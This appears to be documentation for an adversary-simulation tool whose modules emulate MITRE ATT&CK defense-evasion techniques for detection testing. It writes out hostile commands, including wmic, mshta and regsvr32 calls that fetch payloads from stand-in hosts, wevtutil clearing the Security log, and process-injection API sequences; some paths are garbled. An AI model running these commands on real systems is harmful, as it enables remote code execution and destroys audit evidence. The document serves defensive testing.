Defense Evasion¶
T1055.002 - Process Injection: Portable Executable Injection¶
This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject an innocuous shellcode.
T1055.004 - Process Injection: Asynchronous Procedure Call¶
This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject an innocuous shellcode.
T1220 XSL - Script Processing¶
This module uses the CreateProcess Win32 API to execute
wmic.exe os get /FORMAT “http://webserver/payload.xsl”:
Variation 1¶
This module uses the System.Diagnostics .NET namespace to delete the Security Event Log.
Variation 2¶
This module uses the Win32 API CreateProcess to execute a specific command:
wevtutil.exe cl Security
T1218.011 - Signed Binary Proxy Execution: Rundll32¶
This module uses the CreateProcess Win32 API to execute
rundll32.ex C:Windowstwain_64.dll
T1218.003 - Signed Binary Proxy Execution: CMSTP¶
This module uses the CreateProcess Win32 API to execute
cmstp.exe /s /ns C:UsersAdministratorAppDataLocalTempXKNqbpzl.txt
T1218.005 - Signed Binary Proxy Execution: Mshta¶
This module uses the CreateProcess Win32 API to execute
mshta.exe http://webserver/payload.hta
T1140 - Deobfuscate/Decode Files or Information¶
This module uses the CreateProcess Win32 API to execute
certutil.exe -decode encodedb64.txt decoded.exe
T1218.010 - Signed Binary Proxy Execution: Regsvr32¶
This module uses the CreateProcess Win32 API to execute
regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll
T1218.009 - Signed Binary Proxy Execution: Regsvcs/Regasm¶
This module uses the CreateProcess Win32 API to execute
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U winword.dll